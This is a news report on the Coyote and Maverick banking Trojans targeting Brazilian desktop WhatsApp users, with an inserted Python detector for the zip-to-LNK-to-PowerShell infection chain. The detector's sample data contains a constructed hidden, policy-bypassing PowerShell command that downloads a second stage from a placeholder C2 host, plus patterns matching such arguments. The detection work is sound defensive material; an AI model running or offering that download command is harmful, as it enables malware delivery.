In recent months, multiple threat campaigns have enabled several banking Trojans to infiltrate systems across Brazil, resulting in a growing number of victims.
CyberProof researchers published an updated report this week examining two malware variants, Coyote and Maverick, which have persistently attacked Brazilian citizens over the past year. CyberProof initially documented Coyote in February, outlining how it exploits desktop WhatsApp to capture victims’ financial and crypto-wallet information.
The research blog details how CyberProof analysts identified notable overlaps between Coyote and several recently uncovered banking Trojans, including Maverick (reported by Kaspersky and BlueVoyant), Sorvepotel (investigated by Trend Micro), and a separate WhatsApp worm documented by Sophos last month.
Data from Sophos shows that Brazil accounted for almost every confirmed infection. Researchers documented upwards of 450 incidents, primarily within the public sector, alongside additional cases across manufacturing, tech, education, and construction.
The attacks consistently aimed at Brazilian desktop WhatsApp users, capturing banking details and replicating through affected users’ contact lists. Though financial malware has long been a familiar threat, and related campaigns have been detected before, CyberProof’s research illustrates the significant risks posed by focused, region-based cyber campaigns.
Coyotes & Mavericks
Since publishing their findings in February, CyberProof researchers have encountered Coyote alongside several comparable threats. This ongoing work has revealed notable commonalities between Coyote and the extensively documented Maverick strain.
Beyond the noted parallels, both malware strains rely on a similar distribution tactic in which targets receive a zip attachment—frequently sent by an infected contact—along with prompts to open the embedded LNK file on a desktop. Once opened, the LNK executes PowerShell scripts that launch a multistage attack chain.
The attack chain includes establishing communication with a C2 server, downloading the secondary payload, and collecting financial and crypto-wallet information. Despite some observed differences, CyberProof found that both malware families are developed in .NET and share similar code for tracking banking application activity.
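One defensive check that follows from the chain described above, as an added example that is not CyberProof's code or any detection logic from the reports cited: it scores Sysmon-style process-creation records for PowerShell launched by Explorer from a zip-extraction scratch folder with hidden-window, policy-bypass or download arguments. The sample events, user name, archive name and C2 host are constructed.

```python
import re

# Constructed Sysmon-style process-creation records (Event ID 1 fields), not real telemetry.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'powershell.exe -w hidden -ep bypass -c "iwr http://c2.example.invalid/stage2 -OutFile $env:TEMP\s.ps1"',
     "cwd": r"C:\Users\ana\AppData\Local\Temp\Temp1_comprovante.zip"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Users\ana\AppData\Local\WhatsApp\WhatsApp.exe",
     "cmdline": r'"C:\Users\ana\AppData\Local\WhatsApp\WhatsApp.exe"',
     "cwd": r"C:\Users\ana"},
    {"parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -File C:\Scripts\backup.ps1",
     "cwd": r"C:\Scripts"},
]

POWERSHELL = re.compile(r"\\(powershell|pwsh)\.exe$", re.I)
# Explorer unpacks a file opened directly from inside a .zip into %TEMP%\Temp1_<archive>.zip\
ZIP_EXTRACT_DIR = re.compile(r"\\Temp\\Temp1_[^\\]+\.zip", re.I)
SUSPICIOUS_ARGS = re.compile(
    r"-w(indowstyle)?\s+hidden|-e(ncodedcommand|c)\s|-ep\s+bypass|executionpolicy\s+bypass"
    r"|iwr\s|invoke-webrequest|downloadstring", re.I)

def score_event(ev):
    """Return (score, reasons) for one process-creation record; non-PowerShell images score 0."""
    reasons = []
    if not POWERSHELL.search(ev["image"]):
        return 0, reasons
    if ev["parent"].lower().endswith(r"\explorer.exe"):
        reasons.append("powershell spawned by explorer.exe (shortcut double-click)")
    if ZIP_EXTRACT_DIR.search(ev["cwd"]):
        reasons.append("working dir is an Explorer zip-extraction folder")
    if SUSPICIOUS_ARGS.search(ev["cmdline"]):
        reasons.append("hidden/bypass/download arguments")
    return len(reasons), reasons

def find_lnk_chain(events, threshold=2):
    """Return (index, reasons) for events matching the zip -> LNK -> PowerShell pattern."""
    hits = []
    for i, ev in enumerate(events):
        score, reasons = score_event(ev)
        if score >= threshold:
            hits.append((i, reasons))
    return hits

if __name__ == "__main__":
    for idx, why in find_lnk_chain(SAMPLE_EVENTS):
        print(f"event {idx}: {'; '.join(why)}")
```

The threshold of two signals keeps an administrator's `powershell.exe -File` run from cmd.exe out of the results while the Explorer-launched, zip-resident, hidden download stage is flagged.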
Past incidents involving Maverick showed it affecting users associated with financial institutions, hospitality businesses, and desktop WhatsApp users drawn in through its replication mechanism. Coyote appears to target a similar set of victims.